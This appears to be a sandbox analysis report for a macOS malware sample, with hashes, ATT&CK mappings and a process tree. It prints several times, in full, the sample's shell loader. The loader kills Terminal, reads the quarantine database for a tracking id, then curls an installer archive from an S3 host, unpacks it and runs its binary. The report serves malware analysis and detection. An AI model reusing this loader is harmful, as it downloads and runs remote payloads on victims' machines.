b850cd121b76d1b1610a05fde0c7a11e3169f545617a5a5b0e7c440bd7b30944

Analysis

max time kernel
118s
max time network
151s
platform
macos-10.15_amd64
resource
macos-20241106-en
resource tags

arch:amd64arch:i386image:macos-20241106-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
17/02/2025, 18:06 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Macos-Malware-Samples-main/156e3d2ef4b0afa34f61cb01989fae2ca1c0b98cb122d166b163038c3a11b661
Size

16KB
MD5

8d23f9c201b3ea7b5364d130d628f152
SHA1

56890846c98e2ca800089f3590a85032008e736e
SHA256

156e3d2ef4b0afa34f61cb01989fae2ca1c0b98cb122d166b163038c3a11b661
SHA512

c4948dddd1eea6eab006fa3821d9011cbedac54b836fd30093329bfa14e84c6d3afb7a1b08cc82d83496bc46ad909bb542a8db2820672e63e9518bf748e77c9e
SSDEEP

192:1cJbq4vuqoAhXhr4JnXMbTLV7Nd0hg+uUVzCM28JTb3wznfHFPzdkbEhEEeYFYS7:1cQ4vuxo4kvdwLdYaEzPNzd2EecYgjj

Score

7^/10

exfiltration

Malware Config

Signatures

Exfiltration Over Alternative Protocol 1 TTPs 1 IoCs

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

exfiltration

Exfiltration Over Unencrypted Non-C2 Protocol

T1048.003

ioc	Process
sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]\|\|[ \"\${param}\" == \"sidw\" ]\|\|[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/mktemp -d \"\$(dirname \"\${tgz_path}\")/\$(uuidgen)\");if tar -xzf \"\${tgz_path}\" -C \"\${app_dir}\";then echo \"\${app_dir}\";fi;rm -rf \"\${tgz_path}\";};app_path(){ local -r app_dir=\"\${1}\";[ -z \"\${app_dir}\" ]&&return;local -r app_paths=(\"\${app_dir}\"/?.app);local -r app_path=\"\${app_paths[0]}\";[ -d \"\${app_path}\" ]&&echo \"\${app_path}\";};bin_path(){ local -r app_path=\"\${1}\";[ -z \"\${app_path}\" ]&&return;local -r binary_paths=(\"\${app_path}/Contents/MacOS\"/?*);local -r binary_path=\"\${binary_paths[0]}\";echo \"\${binary_path}\";};exec_bin(){ local -r bin_path=\"\${1}\";local -r did=\"\${2}\";local -r app_path=\"\${3}\";[ -z \"\${bin_path}\" ]&&return;\"\${bin_path}\" -did \"\${did}\";};main(){ local -r url=\"\${1}\";close_terminal;local -r did=\"\$(extract_did)\";[ -z \"\${did}\" ]&&return;local -r tmp_dir=\"\$(/usr/bin/mktemp -d \"\$(temp_dir)\$(uuidgen)\")\";local -r arch_path=\"\$(download \"\${url}\" \"\${tmp_dir}\")\";local -r app_dir=\"\$(unarchive \"\${arch_path}\")\";local -r app_path=\"\$(app_path \"\${app_dir}\")\";local -r bin_path=\"\$(bin_path \"\${app_path}\")\";exec_bin \"\${bin_path}\" \"\${did}\" \"\${app_path}\";rm -rf \"\${tmp_dir}\";};main \"https://ywdd6wfq.s3.amazonaws.com/Installer.app.tgz\"&"	Process not Found

ioc

Process

sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#*\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]||[ \"\${param}\" == \"sidw\" ]||[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/mktemp -d \"\$(dirname \"\${tgz_path}\")/\$(uuidgen)\");if tar -xzf \"\${tgz_path}\" -C \"\${app_dir}\";then echo \"\${app_dir}\";fi;rm -rf \"\${tgz_path}\";};app_path(){ local -r app_dir=\"\${1}\";[ -z \"\${app_dir}\" ]&&return;local -r app_paths=(\"\${app_dir}\"/?*.app);local -r app_path=\"\${app_paths[0]}\";[ -d \"\${app_path}\" ]&&echo \"\${app_path}\";};bin_path(){ local -r app_path=\"\${1}\";[ -z \"\${app_path}\" ]&&return;local -r binary_paths=(\"\${app_path}/Contents/MacOS\"/?*);local -r binary_path=\"\${binary_paths[0]}\";echo \"\${binary_path}\";};exec_bin(){ local -r bin_path=\"\${1}\";local -r did=\"\${2}\";local -r app_path=\"\${3}\";[ -z \"\${bin_path}\" ]&&return;\"\${bin_path}\" -did \"\${did}\";};main(){ local -r url=\"\${1}\";close_terminal;local -r did=\"\$(extract_did)\";[ -z \"\${did}\" ]&&return;local -r tmp_dir=\"\$(/usr/bin/mktemp -d \"\$(temp_dir)\$(uuidgen)\")\";local -r arch_path=\"\$(download \"\${url}\" \"\${tmp_dir}\")\";local -r app_dir=\"\$(unarchive \"\${arch_path}\")\";local -r app_path=\"\$(app_path \"\${app_dir}\")\";local -r bin_path=\"\$(bin_path \"\${app_path}\")\";exec_bin \"\${bin_path}\" \"\${did}\" \"\${app_path}\";rm -rf \"\${tmp_dir}\";};main \"https://ywdd6wfq.s3.amazonaws.com/Installer.app.tgz\"&"

Process not Found

/bin/sh
sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/156e3d2ef4b0afa34f61cb01989fae2ca1c0b98cb122d166b163038c3a11b661\""
1⤵
PID:489

/bin/bash
sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/156e3d2ef4b0afa34f61cb01989fae2ca1c0b98cb122d166b163038c3a11b661\""
1⤵
PID:489

/usr/bin/sudo
sudo /bin/zsh -c /Users/run/Macos-Malware-Samples-main/156e3d2ef4b0afa34f61cb01989fae2ca1c0b98cb122d166b163038c3a11b661
1⤵
PID:489
- /bin/zsh
  /bin/zsh -c /Users/run/Macos-Malware-Samples-main/156e3d2ef4b0afa34f61cb01989fae2ca1c0b98cb122d166b163038c3a11b661
  2⤵
  PID:490
- /Users/run/Macos-Malware-Samples-main/156e3d2ef4b0afa34f61cb01989fae2ca1c0b98cb122d166b163038c3a11b661
  /Users/run/Macos-Malware-Samples-main/156e3d2ef4b0afa34f61cb01989fae2ca1c0b98cb122d166b163038c3a11b661
  2⤵
  PID:490

/bin/sh
sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#*\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]||[ \"\${param}\" == \"sidw\" ]||[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/mktemp -d \"\$(dirname \"\${tgz_path}\")/\$(uuidgen)\");if tar -xzf \"\${tgz_path}\" -C \"\${app_dir}\";then echo \"\${app_dir}\";fi;rm -rf \"\${tgz_path}\";};app_path(){ local -r app_dir=\"\${1}\";[ -z \"\${app_dir}\" ]&&return;local -r app_paths=(\"\${app_dir}\"/?*.app);local -r app_path=\"\${app_paths[0]}\";[ -d \"\${app_path}\" ]&&echo \"\${app_path}\";};bin_path(){ local -r app_path=\"\${1}\";[ -z \"\${app_path}\" ]&&return;local -r binary_paths=(\"\${app_path}/Contents/MacOS\"/?*);local -r binary_path=\"\${binary_paths[0]}\";echo \"\${binary_path}\";};exec_bin(){ local -r bin_path=\"\${1}\";local -r did=\"\${2}\";local -r app_path=\"\${3}\";[ -z \"\${bin_path}\" ]&&return;\"\${bin_path}\" -did \"\${did}\";};main(){ local -r url=\"\${1}\";close_terminal;local -r did=\"\$(extract_did)\";[ -z \"\${did}\" ]&&return;local -r tmp_dir=\"\$(/usr/bin/mktemp -d \"\$(temp_dir)\$(uuidgen)\")\";local -r arch_path=\"\$(download \"\${url}\" \"\${tmp_dir}\")\";local -r app_dir=\"\$(unarchive \"\${arch_path}\")\";local -r app_path=\"\$(app_path \"\${app_dir}\")\";local -r bin_path=\"\$(bin_path \"\${app_path}\")\";exec_bin \"\${bin_path}\" \"\${did}\" \"\${app_path}\";rm -rf \"\${tmp_dir}\";};main \"https://ywdd6wfq.s3.amazonaws.com/Installer.app.tgz\"&"
1⤵
PID:491

/bin/bash
sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#*\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]||[ \"\${param}\" == \"sidw\" ]||[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/mktemp -d \"\$(dirname \"\${tgz_path}\")/\$(uuidgen)\");if tar -xzf \"\${tgz_path}\" -C \"\${app_dir}\";then echo \"\${app_dir}\";fi;rm -rf \"\${tgz_path}\";};app_path(){ local -r app_dir=\"\${1}\";[ -z \"\${app_dir}\" ]&&return;local -r app_paths=(\"\${app_dir}\"/?*.app);local -r app_path=\"\${app_paths[0]}\";[ -d \"\${app_path}\" ]&&echo \"\${app_path}\";};bin_path(){ local -r app_path=\"\${1}\";[ -z \"\${app_path}\" ]&&return;local -r binary_paths=(\"\${app_path}/Contents/MacOS\"/?*);local -r binary_path=\"\${binary_paths[0]}\";echo \"\${binary_path}\";};exec_bin(){ local -r bin_path=\"\${1}\";local -r did=\"\${2}\";local -r app_path=\"\${3}\";[ -z \"\${bin_path}\" ]&&return;\"\${bin_path}\" -did \"\${did}\";};main(){ local -r url=\"\${1}\";close_terminal;local -r did=\"\$(extract_did)\";[ -z \"\${did}\" ]&&return;local -r tmp_dir=\"\$(/usr/bin/mktemp -d \"\$(temp_dir)\$(uuidgen)\")\";local -r arch_path=\"\$(download \"\${url}\" \"\${tmp_dir}\")\";local -r app_dir=\"\$(unarchive \"\${arch_path}\")\";local -r app_path=\"\$(app_path \"\${app_dir}\")\";local -r bin_path=\"\$(bin_path \"\${app_path}\")\";exec_bin \"\${bin_path}\" \"\${did}\" \"\${app_path}\";rm -rf \"\${tmp_dir}\";};main \"https://ywdd6wfq.s3.amazonaws.com/Installer.app.tgz\"&"
1⤵
PID:491

/usr/bin/killall
killall Terminal
1⤵
PID:493

/usr/bin/sqlite3
/usr/bin/sqlite3 /Users/run/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 "SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1"
1⤵
PID:496

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Exfiltration Over Alternative Protocol

T1048

Exfiltration Over Unencrypted Non-C2 Protocol

T1048.003

Impact

Windows 7 deprecation

Loading Replay Monitor...

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.